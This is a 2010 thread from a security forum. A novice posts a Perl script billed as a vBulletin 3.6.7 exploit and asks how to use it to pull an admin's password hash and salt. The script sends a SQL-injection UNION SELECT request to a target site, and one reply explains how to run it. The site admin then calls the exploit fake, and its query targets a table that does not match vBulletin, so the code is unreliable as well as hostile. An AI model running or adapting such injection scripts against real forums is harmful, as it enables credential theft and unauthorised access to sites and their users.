 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 76
Members: 0
Total: 76
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
vBulletin 3.6.7 Exploit help needed |
 |
Posted: Thu Jan 21, 2010 11:05 am |
|
|
magicmonkey |
Regular user |

 |
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
 |
 |
 |
|
I'm a newbee I found the below exploit, but without sounding dumb, how do I use it? Thanks in-advance.
!/usr/bin/perl
use IO::Socket;
if (!$ARGV[2]) {
print q{
Usage: perl vbulletin.pl host /directory/ victim_userid
perl vbulletin.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print" __ \r\n";
print" /|/| / / / | / \r\n";
print"( / | ___ ( ___ (___| ___ ___ ( ___ ___ ___ \r\n";
print"| )| )|___ | | ) | )| )| |___)|___)| ) __/ \r\n";
print"| / |__/|| | |__/| | / |__/||__ | \ |__ | /__ \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------[Usage]-----------------------------------\r\n\r\n";
print " Eg: localhost / 1 Eg2: localhost /vb3/ 5 \r\n\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print " \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http://)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&****=0')+UNION+SELECT+0,salt,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED OR YOU DIDNT SPECIFY A SITE";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print
"----------------------This forum isnt Vulnerable, or incorrect path----------\r\n";
#########################################################
# ahm3d #
# #
# ... #
# #
# #
# #
# #
######################################################### |
|
|
|
|
 |
 |
|
 |
Posted: Thu Jan 21, 2010 11:17 am |
|
|
AIR_Nayden |
Advanced user |

 |
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
 |
 |
 |
|
in command prompt
perl PATH_TO_EXPLOUIT
but you have to have PERL installed
where did you get this from? |
|
|
|
|
Posted: Thu Jan 21, 2010 11:24 am |
|
|
magicmonkey |
Regular user |

 |
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
 |
 |
 |
|
|
|
|
|
Posted: Thu Jan 21, 2010 11:36 am |
|
|
AIR_Nayden |
Advanced user |

 |
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
 |
 |
 |
|
u will execute the code in your exploit...... and if you have set the arguments right and you have a vulnerable forum you'll be able to extract hash and salt |
|
|
|
|
Posted: Thu Jan 21, 2010 11:40 am |
|
|
magicmonkey |
Regular user |

 |
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
 |
 |
 |
|
and with them i used be able to create the admin pw? |
|
|
|
|
Posted: Thu Jan 21, 2010 12:27 pm |
|
|
waraxe |
Site admin |

 |
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
 |
 |
 |
|
This exploit is fake, don't waste your time  |
|
|
|
|
Posted: Fri Jan 22, 2010 6:07 am |
|
|
magicmonkey |
Regular user |

 |
|
Joined: Jan 21, 2010 |
Posts: 7 |
|
|
|
 |
 |
 |
|
thanks for the heads up, are there any exploits for 3.6.7 out there? |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|